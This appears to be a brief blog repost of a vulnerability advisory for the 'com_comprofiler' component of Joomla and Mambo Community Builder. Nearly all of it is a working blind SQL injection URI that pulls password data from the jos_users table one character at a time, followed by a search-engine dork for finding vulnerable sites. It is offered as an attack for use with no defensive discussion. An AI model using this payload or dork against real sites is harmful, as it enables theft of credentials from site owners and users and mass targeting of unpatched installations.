Joomla! and Mambo Community Builder 'com_profiler' Component SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Dork: inurl: "com_comprofiler"
Tidak ada komentar:
Posting Komentar